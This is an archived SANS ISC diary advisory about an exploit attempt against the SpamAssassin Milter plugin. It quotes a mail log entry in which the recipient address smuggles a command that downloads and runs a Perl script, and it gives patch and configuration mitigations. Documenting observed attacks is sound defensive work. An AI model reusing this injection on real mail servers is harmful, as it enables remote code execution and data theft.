Threat Level: green Handler on Duty: Brad Duncan

SANS ISC InfoSec Handlers Diary Blog

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Spamassassin Milter Plugin Remote Root Attack

Published: 2010-03-15
Last Updated: 2011-01-30 04:34:25 UTC
by Adrien de Beaupre (Version: 2)
4 comment(s)

Observant reader Roy caught an interesting exploit attempt against his SMTP server. His review of the logs turned up this:

Messages rejected to recipient: root+:|wget
       hxxp://;perl p.txt:[] : User unknown in local recipient
       table; from=<> to=<root+:|wget
       hxxp:// : 1 Time(s)

Handler Bojan notes that it appears that the bad guys have started to actively exploit SpamAssassin's milter vulnerability that has been published last weekend (more details at

The perl script collects some information about the local host and tries to send it to on port 80 -- this host appears to be unreachable at the moment though.

Update: SecurityFocus BID 38578

Mitigation: There is a preliminary patch available at the SpamAssassin Milter Plugin project site, bug #29136: SpamAssassin Milter Plugin Input Validation Flaw Lets Remote Users Execute Arbitrary Code:

Alternatively, don't use the -x option when running this plugin, as well do not run it as root.

Adrien de Beaupré Inc.


4 comment(s)
Diary Archives